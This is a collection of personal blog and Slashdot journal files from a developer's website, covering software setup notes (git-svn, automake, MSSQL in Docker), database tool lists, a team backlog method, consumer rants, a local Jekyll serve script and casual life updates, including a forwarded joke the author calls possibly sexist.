Now use [bundler](http://gembundler.com/) as recommended in the rbenv readme to set up an app etc.
Thanks for listening :-)
# Footnote
It pains me somewhat to have to use installations outside of the Ubuntu package manager, however it seems there are some grumblings about the packaged versions of the above software. Add into this that I wish to use the latest RoR on an LTS release of Ubuntu which seeing as the Rails community don't seem to provide debs / repos etc leaves a packaged version out of the question for now. I've learned previously the hard way the destructive effect of randomly installing everything you find outside the package management system of a distro so have tread carefully when creating the above information.
# See also
* [http://benkwok.wordpress.com/2013/08/15/install-rails-on-ubuntu-12-04-lts-with-rbenv/](http://benkwok.wordpress.com/2013/08/15/install-rails-on-ubuntu-12-04-lts-with-rbenv/)
* <https://github.com/asdf-vm/asdf> / <https://asdf-vm.com/> - a version manager for node/ruby/python/etc...
* <https://rvm.io/> - Ruby Version Manager
* Docker - properly isolate all your things - <https://en.wikipedia.org/wiki/Docker_%28software%29>
<file_sep>---
title: "Blollogs"
date: 2004-06-14
slashdot_url: https://slashdot.org/journal/74343/blollogs
---
<p>Sloth gets a <a href="http://dwiseman.blogspot.com/">blog</a></p>
<file_sep>---
title: "light"
date: 2003-11-17
slashdot_url: https://slashdot.org/journal/52384/light
---
Yay for daily <a href="http://www.dilbert.com/comics/dilbert/archive/">dilbert</a>
<file_sep>---
layout: post
title: Git for TFS users
date: 2017-10-27 20:44:06.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
meta:
_wpcom_is_markdown: '1'
_rest_api_published: '1'
_rest_api_client_id: "-1"
_publicize_job_id: '10803929611'
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/10/27/git-for-tfs-users/"
---
I'm considering creating a 30 minute video to help teams transition from Team Foundation Server source control to git (hosted with TFS or Visual Studio Team Services - aka VSTS).
Please [register your interest](http://eepurl.com/c9imrH). If I get enough interest in this then I'll do the work to put it together and launch it.

<file_sep>---
layout: post
title: compiling partimage
date: '2007-03-26T23:06:00.000Z'
author: <NAME>
tags:
- partimage
- dev
- project
modified_time: '2007-03-26T23:32:22.663Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5549746669475271810
blogger_orig_url: https://timwise.blogspot.com/2007/03/compiling-partimage.html
---
Had a problems getting partimage to compile on one of my pcs from a fresh checkout.
svn co https://partimage.svn.sourceforge.net/svnroot/partimage/trunk/partimage partimage
The ./autogen.sh script was failing as follows
tim@lap:~/projects/partimage$ ./autogen.sh
Running "autoreconf -vif" ...
autoreconf: Entering directory .'
autoreconf: running: autopoint --force
autoreconf: running: aclocal -I m4 --output=aclocal.m4t
autoreconf: aclocal.m4' is unchanged
autoreconf: configure.ac: tracing
autoreconf: running: libtoolize --copy --force
autoreconf: running: /usr/bin/autoconf --force
autoreconf: running: /usr/bin/autoheader --force
autoreconf: running: automake --add-missing --copy
configure.ac: 16: required file ./[config.h].in' not found
Makefile.am:1: AM_GNU_GETTEXT in configure.ac' but intl' not in SUBDIRS
automake: Makefile.am: AM_GNU_GETTEXT in configure.ac' but ALL_LINGUAS' not defined
autoreconf: automake failed with exit status: 1
Done.
Barked up lots of wrong trees, including looking for missing libraries, gettext config etc.
Turned out to be an old version of automake.
Not sure how my other pc ended up with the right version, but this pc's version was:
$ automake --version
automake (GNU automake) 1.4-p6
Installing new version (with some help from command line auto-completion):
$ apt-get install automake_[tab]_
automake automake1.5 automake1.8
automake1.4 automake1.6 automake1.9
automake1.4-doc automake1.7 automaken
$ sudo apt-get install automake1.9
...
$ automake --version
automake (GNU automake) 1.9.6
After updating automake, the ./autogen.sh script ran, and I could then run ./configure and make successfully, and was left with a binary for partimage in src/client/
Hurrah.
The solution came from a post by <NAME> on cdsware.cern.ch:
> [Re: problem with autoreconf when installing from cvs](http://cdsware.cern.ch/lists/project-cdsware-users/archive/msg00694.shtml)
>
> * From: <NAME><tibor.simko@xxxxxxx>
> * Subject: Re: problem with autoreconf when installing from cvs
> * Date: Thu, 18 Jan 2007 18:12:20 +0100
>
> Hello:
>
> On Thu, 18 Jan 2007, <NAME> wrote:
>
> > $ autoreconf
> > Makefile.am:23: AM_GNU_GETTEXT in configure.ac' but intl' not in SUBDIRS
> > automake: Makefile.am: AM_GNU_GETTEXT in configure.ac' but
> > ALL_LINGUAS' not defined
>
> Which version numbers of automake, autoconf, and gettext do you have?
> E.g. automake versions prior to 1.9 and gettext versions prior to 0.14
> will not work.
>
> Best regards
> --
> <NAME></<EMAIL>@xxxxxxx>
<file_sep>---
title: "motorola"
date: 2003-11-17
slashdot_url: https://slashdot.org/journal/52399/motorola
---
<p>apparently their mailservers are down. have been for a week.</p>
<p>Hoorah for leading edge technical firms.</p>
<p>Talked to the next guy in their call farm, he got arsey and said that they couldn't really support their product on a different manufacturer's phone.</p>
<p>Tossers.</p>
<file_sep>---
layout: post
title: openlayers svn into git
date: '2010-02-04T14:01:00.014Z'
author: <NAME>
tags:
- git
- openlayers
- svn
modified_time: '2011-05-18T22:12:01.236Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1272986229621647717
blogger_orig_url: https://timwise.blogspot.com/2010/02/openlayers-svn-into-git.html
---
Initial clone:
git svn clone -T trunk/openlayers/ -t tags/openlayers/ -b branches/openlayers/ http://svn.openlayers.org/ openlayers.git
"http://svn.openlayers.org/tags/openlayers/docs-2.8/" is in the wrong place and gets pulled in by the git clone.
I should have used `--no-follow-parent` to avoid the _docs-2.8_ tag pulling in docs history but not going to re-clone now. If you are repeating this, try this instead:
git svn clone --no-follow-parent -T trunk/openlayers/ -t tags/openlayers/ -b branches/openlayers/ http://svn.openlayers.org/ openlayers.git
Find the errant docs branches & eliminate:
cd openlayers.gitfor x in `git for-each-ref --format="%(refname)" 'refs/remotes/tags/docs*'`; do git update-ref -d $x; done
[http://dound.com/2009/04/git-forever-remove-files-or-folders-from-history/](http://dound.com/2009/04/git-forever-remove-files-or-folders-from-history/)
expunge old objects (I think this works)
git reflog expire --allgit gc --aggressive --prune
Then run: [http://www.shatow.net/fix-svn-refs.sh](http://www.shatow.net/fix-svn-refs.sh) to create real git tags.
If you just want the result you can download a copy complete with svn metadata from [http://www.timwise.co.uk/openlayers-dev/openlayers.git.tgz](http://www.timwise.co.uk/openlayers-dev/openlayers.git.tgz)
You will then be able to run
git svn fetch
to get updates from the openlayers svn server.
There is a published copy at [http://github.com/timabell/openlayers](http://github.com/timabell/openlayers), though it doesn't have the svn metadata.
* * *
I also tackled the docs folder:
The docs directory has no matching branch or tag directories, so the following is sufficient:
git svn clone -T trunk/doc http://svn.openlayers.org/ openlayers-doc.gitgit gc --aggressive --prune
You can download this from [http://www.timwise.co.uk/openlayers-dev/openlayers-doc.git.tgz](http://www.timwise.co.uk/openlayers-dev/openlayers-doc.git.tgz)
* * *
Anything else I come up with will end up at [http://www.timwise.co.uk/openlayers-dev/](http://www.timwise.co.uk/openlayers-dev/)
<file_sep>---
title: "Anargams"
date: 2003-12-12
slashdot_url: https://slashdot.org/journal/54879/anargams
---
<p>Anagrams of <NAME> (yes, that's me.)<br>Can't remember where I got it. some link off b3ta I expect.</p>
<p>Hot Me<NAME><br>I'm the tall boy<br>AH BE TIT MOLLY<br>AH IBM TO TELLY<br>TOBY A H MILLET<br>THAI BE MY TOLL<br>HALLO IM BETTY<br>MY HALO BE TILT<br>BYE TO ILL MATH<br>LET MY HAT BOIL<br>BET I'M THY LOLA<br>THY LOLA BIT ME!<br>TOTALLY BE HIM<br>ME HIT TALL BOY<br>LAY THE TO LIMB<br>AM BILL THE TOY</p>
<file_sep>---
title: "firefox bookmark synch extension"
date: 2005-06-23
slashdot_url: https://slashdot.org/journal/110184/firefox-bookmark-synch-extension
---
<p>after an earlier post saying the synchroniser was broken on firefox 1.0.4 (which it was!) it appears to have mysteriously started working again.<br>I'm not aware of having performed any updates.</p>
<p>weird.</p>
<p>so in short;<br>the bookmarks on timwise.co.uk will be up to date once more.</p>
<file_sep>---
title: "Play / 14th Oct"
date: 2004-09-28
slashdot_url: https://slashdot.org/journal/85200/play--14th-oct
---
<p><a href="http://twyrusdrama.org.uk/Oct04.htm">http://twyrusdrama.org.uk/Oct04.htm</a></p>
<p>Hello one and all,</p>
<p>My drama group is putting on a production of Clerical Errors in two weeks time. The script looks to be very amusing and I'm looking forward to going. Let me know if you want to come with me.</p>
<p>I plan to go on the first night and to involve a meal hopefully at La Fontana. Tickets are £6. I will be putting in the order for tickets this friday so try to let me know by then if you're going to make it.</p>
<p>It's a hot ticket! Don't miss out<nobr> </nobr>;)</p>
<p>If you can't make Thursday let me know and I'll put together numbers for the other two nights and may go again.</p>
<p>Yours</p>
<p>Tim</p>
<p>mail me on<br>tim@<a href="http://www.timwise.co.uk/">timwise.co.uk</a></p>
<p>
---------------</p>
<p>If you didn't get this as an email it either means I don't know who you are (hello! mail me<nobr> </nobr>:) or I got your address wrong or never had it, in which case mail me!</p>
<p>Another couple of thoughts on contact details etc:<br>Do you have a website? If so let me know and if you don't mind I'll post a link to it.<br>Secondly,<nobr> </nobr>/. has a system for tracking relationships which is quite cool, so can I suggest we all get<nobr> </nobr>/. accounts and set each other as friends (or foes, mwaa ha ha.) then we won't ever have to keep that big list of email addresses. Do it now!<br><a href="http://slashdot.org/login.pl?op=newuserform">http://slashdot.org/login.pl?op=newuserform</a></p>
<file_sep>---
title: "ebay - buy my stuff"
date: 2005-03-07
slashdot_url: https://slashdot.org/journal/100196/ebay---buy-my-stuff
---
<p>I am currently selling my prized possessions on eBay.</p>
<ul> <li>cd player</li>
<li>barbells (not mine)</li>
<li>scanner</li>
<li>washing machine!</li>
</ul>
<p><a href="http://search.ebay.co.uk/_W0QQfgtpZ1QQfrppZ25QQsassZtimQ5fabell">tim_abell's items on eBay</a><br>No-one's bid yet so it's bargain basement prices!</p>
<file_sep>---
layout: page
title: Send me a voice message
permalink: /message/
---
<iframe src="https://www.speakpipe.com/widget/inline/xk0i1rwxa0eiva276zef9bkgom7bra48" allow="microphone" width="100%" height="200" frameborder="0"></iframe>
<script async src="https://www.speakpipe.com/widget/loader.js" charset="utf-8"></script>
<https://www.speakpipe.com/ssbf>
<file_sep>---
title: "I hate ebay because..."
date: 2005-06-12
slashdot_url: https://slashdot.org/journal/109161/i-hate-ebay-because
---
<ul> <li>their website is soooo slow.</li>
<li>You can't change a listing in the last 24hrs, but there's nothing to say so</li>
<li>You can't see anything before 60 days ago</li>
<li>You can't change your invoices if you make a mistake</li>
<li>they really stress me out every time i try to use their stupid website.</li>
<li>the whole thing is really counter intuitive</li>
<li>there is no competition, so they can be as shit as they want and people will still use it.</li>
</ul>
<p>/ unashamed rant</p>
<p>Ps I've had a shitty cold for the last few days.<br>Yes, I'm currently a bad mood bear. Did I mention I hate sundays too? Why does everything shut by the time I'm up? (4pm) If they've even bothered opening at all.</p>
<p>Someone find me a beer.</p>
<p>edit:<br>ok, having read this<br><a href="http://forums.ebay.com/db2/thread.jspa?threadID=2231811&tstart=0&mod=1114654773979">http://forums.ebay.com/db2/thread.jspa?threadID=2231811&tstart=0&mod=1114654773979</a><br>I'm never using ebay again. [expletive deleted].</p>
<p>by the way, the reason i'm so pissed is that they've charged me for two listings which I NEVER GOT PAYMENT FOR. [expletive deleted]</p>
<file_sep>---
layout: post
title: Don't trust audible.com, it's drm infected and they don't tell you
date: '2008-07-23T22:28:00.006Z'
author: <NAME>
tags:
- rant
- opinion
- review
- drm
modified_time: '2008-07-24T18:21:38.453Z'
thumbnail: http://farm4.static.flickr.com/3141/2697164218_1fc49eed23_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3207018266105951792
blogger_orig_url: https://timwise.blogspot.com/2008/07/dont-trust-audiblecom-its-drm-infected.html
---
If there's one thing I hate (there isn't, there's lots, but this is today's)
it's companies being economical with the truth to get you to part with your
money, only to have you disappointed when you find out the whole truth.
I just bought an audio book on audible.co.uk. And now I can't even listen to
it. I thought I was buying an mp3, or maybe even an ogg file. It is only on
actually attempting to download the thing I have just paid for that I discover
to my utter disgust that _all_ the download links are for some kind of evil drm
type program (I presume here, but there sure as hell was no mp3 in sight).

As you can see from the screenshot above, they clearly imply an mp3 download. I
haven't seen such a clear use of weasel sales words for some time.
Next time I'll read the god damn small print, but I still think this is totally
out of order not warning that they are providing crippled versions of what you
think you are buying.
Thank fsm for people like the FSF. Their logo really sums up how I feel about
being treated in this way.
[](http://www.defectivebydesign.org/)
## Update: credit where due. 24th July 2008
My complaint about the website still stands, and my aversion to
drm has not diminished, however the responses I have received from their
customer service (by email), have been prompt, courteous and have totally
resolved my outstanding problem. I have been given a full refund. I've been
especially impressed given the hot blooded content of my initial contact. A lot
of companies could learn lessons in good customer relations from these people.
## Update: the battle is lost (for now). 12 Aug 2019
I use audible (now an amazon company) on my not-very-freedom-loving android
phone these days. I haven't tried using audbile on a linux desktop lately,
times have changed and everything is android/iphone first now. I still consider
DRM to be a nasty form of lockin.
<file_sep>---
title: name_here
layout: post
---
content
<file_sep>---
layout: post
title: Personal backlogs
---
## What's wrong with our current backlog / icebucket / todo list?
Do you have a backlog of doom? A bottomless bucket full of probably unimportant things you possibly should do, interspersed with the occasional really important thing that will bite you hard if you don't do it? Do you spend time repeatedly refining the list to make sure you don't miss the important things? Or do you just ignore it and hope luck will save you from the things you let slip?
I've known for a long time that [basecamp promote having no backlog at all](https://basecamp.com/shapeup/2.1-chapter-07#no-backlogs), based on the idea that it takes too much time and anything important will come up again anyway. To some extent I agree, but I have also found serious issues in systems that are perhaps less visible to the naked eye which will for sure have a consequence if not addressed (maybe something that is quietly corrupting data or failing to store it, or maybe a security issue).
## So what should we do instead?
The answer came to me when I read [basecamp's new Shape Up book (summarized here)](/2019/11/26/time-to-shape-up-your-scrum-process-the-new-thing-from-basecamp/) that describes their unique way of working. They don't have a shared backlog, instead they leave it to each person in the organisation to use whatever method they choose to remember what *they* think is important, and then bring that to the table for consideration at the scheduled times that new work is considered.
The full shape-up process is a bit too much of a jump for the teams I usually work on, however I shared the above with a team I worked with, and they took it and came up with an excellent best-of-both-worlds solution. And it's so good I think everyone should use it.
This solution...
* perfectly balances the elimination of a backlog-of-doom nightmare,
* addresses the need to not lose important ideas as team members change,
* and adds the ability to collaborate.
* is ridiculously simple
### Trello
Set it up as follows: Set up a new trello board, name it "shared backlog" or similar, create a list (column) for every team member with their name (and optionally role) as the list title.

Now when anyone thinks of anything that the team should possibly do, they add a card **to their own list** on the shared backlog trello board. It is now clear who owns the idea and is responsible for campaigning to get it prioritized.
In preparation for the next planning session each person organises their own list so that the things they think are most important are on the top.
On a regular basis, (say fortnightly during a sprint planning session or similar), the team goes through the board, and each person talks about their top one or two cards to say why they think it should be included in the sprint. The cards that are chosen by the team get added to the sprint to be done as part of the normal work for the team, thus making sure they actually happen.
Simple eh?
Here's an example board <https://trello.com/b/cxRXPgcb/personal-backlogs-example>, you can use it as a template if you wish.
### Jira
If you're using Jira you can achieve the same effect by abusing the "sprint" feature. Just create some extra sprints with the "Create sprint" button and instead of calling them "sprint 25" etc, call them "Tech backlog", "Design Backlog", "Customer Service Backlog" etc. Then you can nicely group each role's needs and they can manage their own priorities within their own backlog. The actual "backlog" in Jira can now be just for true user stories / product features.

### Useful?
[Let me know](mailto:<EMAIL>) if you use this approach and if it works for you or not.
## What about normal feature development?
You could theoretically have the product owner manage all the forthcoming product features in their column. I think it is better for them to continue to manage the product's feature backlog in the existing jira/trello/github project system, which will now be beautifully free from tech debt, random ideas and other clutter. This is what we did and it worked great.
## Bonus ideas
* Add a label "next sprint", and get people to tag the cards they think should happen next.
* Technical debt often ends up here, read this <http://laughingmeme.org/2016/01/10/towards-an-understanding-of-technical-debt/> to be able to talk more coherently about this topic.
* Turn on voting in trello and vote on each other's cards.
## Did it work for you?
This setup worked superbly for us as a team and I'd recommend it to anyone who'll listen.
We no longer have the overhead of a product owner losing the will to live trying to understand cryptic tech debt cards left by a previous developer, wondering if they were trivial or pending catastrophes.
When someone leaves, the new person or others on the team can look over their cards and decide what to move into their own column.
## Also available on the podcast
If you like this, you might want to have a listen to me and David talking about this and other lessons learned in [episode 8 of software should be free - Hiding from Covid-19 and the end of 2 years at DfE](https://pod.timwise.co.uk/8).
<file_sep>---
title: "why am i here"
date: 2004-11-13
slashdot_url: https://slashdot.org/journal/90243/why-am-i-here
---
<p>From the dnrc newsletter. Say bye bye to your eyes for reading this, especially here in my "blog".</p>
<blockquote>
<div>
<p> <i><br>Dear Dogbert,</i></p>
<p><i>Lots of people write blogs, but I've never heard of anyone who actually reads them. What's up with that?</i></p>
<p><i>Kurt</i></p>
<p><i>Dear Skirt,</i></p>
<p><i>Blogs exist to fill the important market niche of writing that is so dull that your eyes will burrow out of the back of your head to escape. People do read blogs, usually by accident, sometimes on a dare, but those readers are later mistaken for Mafia victims with what appears to be two holes in the back of their heads. On closer inspection, you might find their eyeballs clinging to the drapes directly behind them. Unless the cat gets them first.</i></p>
<p><i>Sincerely,</i></p>
<p><i>Dogbert<br></i></p>
</div> </blockquote>
<p>In other news I feel like a complete c*** today.<br>Where is everybody?</p>
<file_sep>---
title: "Picture-skew"
date: 2004-08-17
slashdot_url: https://slashdot.org/journal/80582/picture-skew
---
<p>Nice <a href="http://www.timwise.co.uk/images/IMG_3919.JPG">here</a>, and <a href="http://www.timwise.co.uk/images/IMG_3955.JPG">here</a>.</p>
<file_sep>---
title: Database migration options for dotnet core
layout: post
---
## Options
* [Built-in EF Core migrations](https://docs.microsoft.com/en-us/ef/core/managing-schemas/migrations/?tabs=dotnet-core-cli)
* [FluentMigrator](https://fluentmigrator.github.io/)
* [DbUp](http://dbup.github.io/)
* [RedGate Deploy](https://www.red-gate.com/products/redgate-deploy/)
* [RedGate SQL Change Automation](https://documentation.red-gate.com/sca/developing-databases/concepts/migrations/migration-scripts)
* [Flyway by RedGate](https://flywaydb.org/)
* [SqlHawk](http://timabell.github.io/sqlHawk/) (I wrote this years ago, forked from the excellent [SchemaSpy](http://schemaspy.org/))
* ? [hit me up on twitter](https://twitter.com/tim_abell) if you know of any more options
Note that the excellent [ReadyRoll got bought by
RedGate](https://www.realwire.com/releases/Redgate-acquires-database-migrations-and-deployment-tool-ReadyRoll)
and renamed to something I can never remember.
## See also
* <https://stackoverflow.com/questions/46649238/alternative-to-redgate-readyroll-yet>
<file_sep>---
title: "swimming"
date: 2004-07-28
slashdot_url: https://slashdot.org/journal/78736/swimming
---
<p>went swimming. now really tired.<br>on phone to australia now, relaying all the gossip that I couldn't possibly put on a public website!</p>
<file_sep>---
layout: post
title: Database tools I was surprised existed
description: A complete list of tools for database people and developers
category: blog
---
But you already know all the tools for working with databases don't you?
That's what I thought too before I started working on [SQL Schema
Explorer](http://schemaexplorer.io/). Even after 18 years working with
databases it turns out I only knew a fraction of the tools that are out there.
Working on SQL Schema Explorer gave me a reason I didn't have before to search
the internet in new ways relating to databases, and now that I'm reaching out
to people about SQL Schema Explorer people are in turn sharing their favourite
tools with me.
I'd hate for this gift to sit hidden away in my private product trello board,
so I've turned it into this article so that you can skip the wilderness years
and gain a zen-like awareness of all the tools of your trade. I'm sure you
won't like or use all of them, and many overlap in function, but the following
list will allow you to try out and assess each one against your needs; perhaps
you'll find a new tool that will save you hours, or make your job that much
more enjoyable. Never again will you have to say to a new colleague "oh I
hadn't heard of that one!".
## Microsoft Sql Server
### SSMS Tools Pack
<https://www.ssmstoolspack.com/>
An add-on to management studio that improves many pieces of SSMS and adds new capabilities.
{:height="200px"}
* €30 for first computer to €5000 for unlimited enterprise use ([SSMS Toolpack
Pricing page](https://www.ssmstoolspack.com/Licensing))
A friend of mine saved many hours using the "CRUD" stored procedure generation capabilities.
### Sql Server Management Studio (SSMS)
Okay you know this one but I have to mention it.
It has awkward but functional diagram support. You can version control these
diagrams and move them between servers with
<https://github.com/timabell/database-diagram-scm> which is worth knowing about
if you ever use the ssms diagrams.
### You can now run MSSQL on open source
Did you know Microsoft SQL Server (aka mssql) is now available on both linux
natively and in docker containers? It's the real deal, not like mono vs .net
* [SQL Server on Linux](https://docs.microsoft.com/en-us/sql/linux/sql-server-linux-setup)
* [SQL Server in Docker](https://docs.microsoft.com/en-us/sql/linux/quickstart-install-connect-docker?view=sql-server-2017)
Here's all it takes to fire up mssql, the only pre-requisite is docker itself.
docker run -e 'ACCEPT_EULA=Y' -e 'SA_PASSWORD=<PASSWORD>' \
-p 1433:1433 --name mssql1 \
-d mcr.microsoft.com/mssql/server:2017-latest
This isn't a tool per-se, but this is too important to not mention, especially
as it's quite new and not everyone is aware of this exciting change from
redmond.
I don't know about you but one less reason to fire up the Windows VM sure does
make me happy. Combined with dotnet core I haven't fired up Windows in months
now.
## Cross-database
### Razor Sql
{:height="200px"}
<http://www.razorsql.com/>
> "RazorSQL is an SQL query tool, database browser, SQL editor, and database
> administration tool for Windows, macOS, Mac OS X, Linux, and Solaris.
> RazorSQL has been tested on over 40 databases, can connect to databases via
> either JDBC or ODBC"
### EZ Data Browser
{:height="200px"}
<http://www.softimum-solutions.com/Data-Browser/Overview.aspx>
* $29.99 per computer
* Licence key by email
* pay via PayPal of credit card
> "software from Softimum Solutions to help users to browse and to edit SQL Server databases quickly and easily"
Provides a configurable MSAccess-like interface to a database.
### SQLeo
Cross-database query builder/analyser. Feature rich - data/schema compare, pivot queries, diagrams etc.
{:height="200px"}
* <http://sqleo.sourceforge.net/>
> "A powerful SQL tool to transform or reverse complex queries (generated by
> OBIEE, Microstrategy, Cognos, Hyperion, Pentaho ...) into diagrams to ease
> visualization and analysis. A graphical query builder that permits to create
> complex SQL queries easily. The GUI with multi-connections supports virtually
> all JDBC drivers, including ODBC bridge, Oracle, MySQL, PostgreSQL, Firebird,
> HSQLDB, H2, CsvJdbc, SQLite. And top of that, everything is open-source!"
* [SQLeo demo video on youtube](https://www.youtube.com/watch?v=emDrdj0IxNI)
* Sourceforge page (ugh) <https://sourceforge.net/projects/sqleo/>
* Fork on github <https://github.com/ojwanganto/SQLeo>
### SQL Fiddle
Live online sql editor / runner
{:height="200px"}
* <http://sqlfiddle.com/>
### DbSchema
{:height="200px"}
* <http://www.dbschema.com/>
> "DbSchema is an SQL and No-SQL database designer featuring interactive
> diagrams, HTML and PDF documentation, schema versioning and migration,
> relational data browse, random data generator, visual query builder, SQL
> editor and database reports."
### DbPrompt
{:height="200px"}
* <http://www.dbschema.com/dbprompt.html>
> "Free Universal Multi-Database SQL Prompt - DbPrompt can execute queries on
> multiple databases, transfer data between databases, upload result files on
> ftp servers, execute complex SQL scripts using Java Groovy and cron-schedule
> scripts for execution and report failures per email. DbPrompt supports all
> SQL and NoSQL databases, like MySql, Cassandra, PostgreSql, MongoDb,
> Redshift, SqlServer, Azure, Oracle, Teradata and more. DbPrompt can work on
> all operating systems. DbPrompt is free of charge. "
## Unsorted - omg will it never end
* <http://www.magereverse.com/>
* <https://dataedo.com/>
* <https://dbvis.com/>
* <https://docs.microsoft.com/en-us/sql/azure-data-studio>
* <https://github.com/ajdeziel/SQL-Data-Viewer> - abandoned
* <https://github.com/preston/railroady/>
* <https://help.talend.com/reader/ISPDm8GQ6s0HN0348QulWg/Ij~7tBlW8im63rAGnGHT3A>
* <https://portableapps.com/apps/development/database_browser_portable>
* <https://redash.io/>
* <https://sequelpro.com/>
* <https://softwarerecs.stackexchange.com/questions/11346/tool-to-visualize-sql-database-schema>
* <https://sqldbm.com/en/>
* <https://sqlitestudio.pl/>
* <https://www.codediesel.com/data/5-tools-to-visualize-database-schemas/>
* <https://www.datasparc.com/>
* <https://www.dbsoftlab.com/online-tutorials/active-table-editor-online-tutorials.html>
* <https://www.devart.com/dbforge/sql/studio/>
* <https://www.idera.com/er-studio-data-architect-saftware>
* <https://www.jetbrains.com/datagrip/> - <https://www.youtube.com/watch?v=Xb9K8IAdZNg>
* <https://www.metabase.com/>
* <https://www.navicat.com/en/products/navicat-data-modeler>
* <https://www.schemacrawler.com/>
* <https://www.sqlservercentral.com/articles/microsoft-sql-server-utilities-and-tools-1>
* <https://jetbrains.com/> intellij/rider/rubymine etc all have the datagrip capabilities built in
* <https://www.red-gate.com/> sql prompt etc
* <https://www.oracle.com/database/technologies/appdev/datamodeler.html>
* <https://erwin.com/products/erwin-data-modeler/>
* DBeaver
* Azure Data Studio - PostgreSQL extension
* SAP PowerDesigner <https://www.sap.com/products/powerdesigner-data-modeling-tools.html> - I have no idea what this is. Sounds enterprisey.
* <https://en.wikipedia.org/wiki/PowerDesigner>
* <https://www.idera.com/er-studio-enterprise-data-modeling-and-architecture-tools>
* <https://www.idera.com/er-studio-data-architect-software>
* <https://sparxsystems.com/products/ea/>
* <https://www.ibm.com/us-en/marketplace/infosphere-data-architect>
* <https://www.postgrescompare.com/>
## Places to find even more database tools and learn more
* <https://en.wikipedia.org/wiki/Comparison_of_database_tools>
* <https://www.quora.com/How-do-I-generate-an-entity-relationship-diagram-for-a-SQLite-database-file?share=1>
* <https://www.quora.com/What-are-some-good-online-database-schema-design-tool-with-larger-days-of-expiry>
* <https://alternativeto.net/software/mysql-workbench/>
* <https://www.datasciencecentral.com/profiles/blogs/top-6-data-modeling-tools>
* <https://www.educba.com/9-best-data-modeling-tools/>
* <http://www.agiledata.org/essays/dataModeling101.html> - I had no idea what data modelling really meant before reading this.
* <http://www.sqlservercentral.com/articles/Tools/157911/>
* <https://www.apgdiff.com/>
* <http://toolsfordatabases.com/>
* <https://www.webfx.com/blog/web-design/top-five-best-database-management-tools/>
* <https://solutionsreview.com/data-management/data-management-solutions-directory/>
* <https://www.softwaretestinghelp.com/tools/26-best-data-integration-tools/>
## Information overload
If you got this far you probably need to get back to work. It's clear this
article is a bit ridiculous now so I'm not going to carry on sorting it out.
The internet is littered with catalog articles of varying completeness and
quality. To make it complete and good would make it dull and endless.
Watch this space, I think I'll try and work out what people actually are trying
to do and cater for that. Maybe we can all build a collaborative index
somewhere.
## The end
I hope you found at least a few you didn't know about and that they make your
life better in some way. Please do tell me the story of how this helped you on
[email](<EMAIL>) or [twitter](https://twitter.com/tim_abell).
Did I miss something? If you wish to improve this article please ping me a PR
with additions here: https://github.com/timabell/sdv-website or just [email
me](<EMAIL>).
I'm not being paid to promote these, these are not affiliate links, I share
this learning with you all for free so that we can all enjoy our work with
databases more, and create better more reliable databases for ourselves, our
clients and our projects.
If you want to be notified of new articles, sign up to the mailing list (which
currently is also the trial download list).
Till next time!
Originally posted at <a href="http://schemaexplorer.io/blog/2019/06/10/database-tools-you-didnt-know-about.html">http://schemaexplorer.io/blog/2019/06/10/database-tools-you-didnt-know-about.html</a>
<file_sep>---
title: "Nothing much"
date: 2004-10-15
slashdot_url: https://slashdot.org/journal/87058/nothing-much
---
<p>Play was cool, as expected, it's your last chance to see it tonight.</p>
<p>I just compiled a C++ program on linux<nobr> </nobr>:)<br>well, an example one, but I did change hello world to hello bob. Not a quite a killer app, but a step in the right direction. More to follow I expect.</p>
<file_sep>---
title: "busy"
date: 2004-11-30
slashdot_url: https://slashdot.org/journal/91683/busy
---
<p>i've been real busy lately with rehearsals etc. I'm moving house soon so gis' a shout on the old email if you want me new address.</p>
<p>For anyone who doesn't know ants is likely to be out of the country soon, call me / her for details</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: "funky technology"
date: 2005-08-19
slashdot_url: https://slashdot.org/journal/114890/funky-technology
---
<p>get down to the groove of the new HDD storage science!</p>
<p><a href="http://www.hitachigst.com/hdd/research/recording_head/pr/PerpendicularAnimation.html">http://www.hitachigst.com/hdd/research/recording_head/pr/PerpendicularAnimation.html</a><br>flash movie, with hip sound track.</p>
<p>Source:<br><a href="http://hardware.slashdot.org/article.pl?sid=05/08/19/0027237">http://hardware.slashdot.org/article.pl?sid=05/08/19/0027237</a></p>
<file_sep>#!/bin/sh -v
(
while ! nc -z localhost 4000; do sleep 0.1; done # https://stackoverflow.com/questions/27599839/how-to-wait-for-an-open-port-with-netcat
xdg-open http://localhost:4000/
) &
bundle exec jekyll s --livereload $@
<file_sep>---
title: "Wrinkly hands"
date: 2003-10-13
slashdot_url: https://slashdot.org/journal/48982/wrinkly-hands
---
<p>Did the washing up this evening.</p>
<p>woo.</p>
<p>+2 brownie points with gf.</p>
<p>read<nobr> </nobr>/. & b3ta this evening.</p>
<p>-20 points with gf<nobr> </nobr>:(</p>
<p>ps.<br>hello Joel.</p>
<file_sep>---
title: "Busy busy"
date: 2004-08-10
slashdot_url: https://slashdot.org/journal/79902/busy-busy
---
<p>Life is good.<br>I'm far too busy to write anything interesting in my journal so instead here's the possibly sexist joke that fluffy sent me last week.</p>
<p>Made me laugh anyway. Well I had had quite a few drinks and it was about 1am.</p>
<p>==============</p>
<p>We always hear "the rules" from the female side. Now here are the rules</p>
<p>from the male side.</p>
<p>These are our rules:</p>
<p>Please note... these are all numbered "1" ON PURPOSE!</p>
<p>1. Breasts are for looking at and that is why we do it. Don't try to</p>
<p>change that.</p>
<p>1. Learn to work the toilet seat. You're a big girl. If it's up, put it</p>
<p>down. We need it up, you need it down. You don't hear us complaining</p>
<p>about you leaving it down.</p>
<p>1. Saturday = sports. It's like the full moon or the changing of the</p>
<p>tides. Let it be.</p>
<p>1. Shopping is NOT a sport. And no, we are never going to think of it</p>
<p>that way.</p>
<p>1. Crying is blackmail.</p>
<p>1. Ask for what you want. Let us be clear on this one: Subtle hints do</p>
<p>not work! Strong hints do not work! Obvious hints do not work! Just say</p>
<p>it!</p>
<p>1. Yes and No are perfectly acceptable answers to almost every question.</p>
<p>1. Come to us with a problem only if you want help solving it. That's</p>
<p>what we do. Sympathy is what your girlfriends are for.</p>
<p>1. A headache that lasts for 17 months is a problem. See a doctor.</p>
<p>1. Anything we said 6 months ago is inadmissible in an argument. In</p>
<p>fact, all comments become null and void after 7 days.</p>
<p>1. If you think you're fat, you probably are. Don't ask us.</p>
